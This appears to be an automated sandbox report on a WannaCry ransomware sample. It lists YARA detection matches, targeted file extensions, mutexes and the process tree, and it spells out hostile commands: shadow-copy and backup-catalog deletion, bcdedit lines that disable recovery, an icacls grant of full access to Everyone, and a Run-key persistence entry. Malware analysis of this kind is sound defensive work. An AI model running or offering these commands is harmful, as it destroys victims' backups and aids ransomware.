Source: C:\Users\user\Desktop\109861721946031.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\109861721946031.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\109861721946031.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\109861721946031.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\109861721946031.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\109861721946031.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\109861721946031.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\109861721946031.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\109861721946031.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\109861721946031.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\109861721946031.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\109861721946031.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\109861721946031.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\109861721946031.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\109861721946031.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\109861721946031.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\109861721946031.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\109861721946031.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\109861721946031.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\109861721946031.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\109861721946031.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\109861721946031.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\109861721946031.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\109861721946031.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\109861721946031.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\109861721946031.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/

Source: LisectAVT_2403002A_126.EXE.exe, 00000000.00000003.882205706.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002A_126.EXE.exe, 00000000.00000003.890589272.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002A_126.EXE.exe, 00000000.00000003.1376826928.0000000000B07000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002A_126.EXE.exe, 00000000.00000003.1171288233.0000000000B06000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002A_126.EXE.exe, 00000000.00000003.1843993225.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002A_126.EXE.exe, 00000000.00000003.872152587.0000000000AD3000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002A_126.EXE.exe, 00000000.00000003.1844791357.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, @WanaDecryptor@.exe, 0000001F.00000000.1847688235.000000000041F000.00000008.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 0000001F.00000002.5896069022.000000000041F000.00000008.00000001.01000000.0000000B.sdmp	Binary or memory string: A.der.pfx.key.crt.csr.p12.pem.odt.ott.sxw.stw.uot.3ds.max.3dm.ods.ots.sxc.stc.dif.slk.wb2.odp.otp.sxd.std.uop.odg.otg.sxm.mml.lay.lay6.asc.sqlite3.sqlitedb.sql.accdb.mdb.db.dbf.odb.frm.myd.myi.ibd.mdf.ldf.sln.suo.cs.c.cpp.pas.h.asm.js.cmd.bat.ps1.vbs.vb.pl.dip.dch.sch.brd.jsp.php.asp.rb.java.jar.class.sh.mp3.wav.swf.fla.wmv.mpg.vob.mpeg.asf.avi.mov.mp4.3gp.mkv.3g2.flv.wma.mid.m3u.m4u.djvu.svg.ai.psd.nef.tiff.tif.cgm.raw.gif.png.bmp.jpg.jpeg.vcd.iso.backup.zip.rar.7z.gz.tgz.tar.bak.tbk.bz2.PAQ.ARC.aes.gpg.vmx.vmdk.vdi.sldm.sldx.sti.sxi.602.hwp.snt.onetoc2.dwg.pdf.wk1.wks.123.rtf.csv.txt.vsdx.vsd.edb.eml.msg.ost.pst.potm.potx.ppam.ppsx.ppsm.pps.pot.pptm.pptx.ppt.xltm.xltx.xlc.xlm.xlt.xlw.xlsb.xlsm.xlsx.xls.dotx.dotm.dot.docm.docb.docx.docConnecting to server...s.wnry%08X.eky%08X.res00000000.resrb%08X.dky%08X.pkyConnectedSent requestSucceedReceived responseCongratulations! Your payment has been checked!
Source: LisectAVT_2403002A_126.EXE.exe, 00000000.00000000.849626717.000000000040E000.00000008.00000001.01000000.00000003.sdmp	Binary or memory string: @.der.pfx.key.crt.csr.p12.pem.odt.ott.sxw.stw.uot.3ds.max.3dm.ods.ots.sxc.stc.dif.slk.wb2.odp.otp.sxd.std.uop.odg.otg.sxm.mml.lay.lay6.asc.sqlite3.sqlitedb.sql.accdb.mdb.db.dbf.odb.frm.myd.myi.ibd.mdf.ldf.sln.suo.cs.c.cpp.pas.h.asm.js.cmd.bat.ps1.vbs.vb.pl.dip.dch.sch.brd.jsp.php.asp.rb.java.jar.class.sh.mp3.wav.swf.fla.wmv.mpg.vob.mpeg.asf.avi.mov.mp4.3gp.mkv.3g2.flv.wma.mid.m3u.m4u.djvu.svg.ai.psd.nef.tiff.tif.cgm.raw.gif.png.bmp.jpg.jpeg.vcd.iso.backup.zip.rar.7z.gz.tgz.tar.bak.tbk.bz2.PAQ.ARC.aes.gpg.vmx.vmdk.vdi.sldm.sldx.sti.sxi.602.hwp.snt.onetoc2.dwg.pdf.wk1.wks.123.rtf.csv.txt.vsdx.vsd.edb.eml.msg.ost.pst.potm.potx.ppam.ppsx.ppsm.pps.pot.pptm.pptx.ppt.xltm.xltx.xlc.xlm.xlt.xlw.xlsb.xlsm.xlsx.xls.dotx.dotm.dot.docm.docb.docx.docWANACRY!%s\%sCloseHandleDeleteFileWMoveFileExWMoveFileWReadFileWriteFileCreateFileWkernel32.dll

Source: classification engine

Classification label: mal100.rans.evad.winEXE@40/988@0/6

Source: C:\Users\user\Desktop\@WanaDecryptor@.exe

Code function: 31_2_00403A20 GetLogicalDrives,GetDriveTypeW,GetDriveTypeW,GetDiskFreeSpaceExW,

31_2_00403A20

Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe

File created: C:\Users\user\Desktop\b.wnry

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2360:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9196:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4832:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5692:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4228:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8668:304:WilStaging_02
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Mutant created: \Sessions\1\BaseNamedObjects\MsWinZonesCacheCounterMutexA
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4832:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4228:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8668:120:WilError_03
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\MsWinZonesCacheCounterMutexA0
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2360:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5692:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9196:120:WilError_03

Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe

File created: C:\Documents and Settings\All Users\Adobe\Temp\~SD6D4F.tmp

Jump to behavior

Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 109861721946031.bat

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe //nologo m.vbs

Source: LisectAVT_2403002A_126.EXE.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\cscript.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\taskdl.exe

Evasive API call chain: __getmainargs,DecisionNodes,exit

graph_6-217

Source: unknown	Process created: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe "C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe"
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Windows\SysWOW64\attrib.exe attrib +h .
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Windows\SysWOW64\icacls.exe icacls . /grant Everyone:F /T /C /Q
Source: C:\Windows\SysWOW64\attrib.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\icacls.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 109861721946031.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe //nologo m.vbs
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe co
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c start /b @WanaDecryptor@.exe vs
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe vs
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Process created: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe TaskData\Tor\taskhsvc.exe
Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic shadowcopy delete
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskse.exe taskse.exe C:\Users\user\Desktop\@WanaDecryptor@.exe
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "njyalyugfohc920" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Windows\SysWOW64\attrib.exe attrib +h .	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Windows\SysWOW64\icacls.exe icacls . /grant Everyone:F /T /C /Q	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 109861721946031.bat	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe //nologo m.vbs	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe vs
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic shadowcopy delete
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe

Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Section loaded: msvcp60.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\attrib.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\attrib.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: edgegdi.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: thumbcache.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: photometadatahandler.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: mfc42.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: wininet.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: netutils.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: edgegdi.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: riched32.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: riched20.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: usp10.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: msls31.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: mfc42.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: wininet.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: iertutil.dll
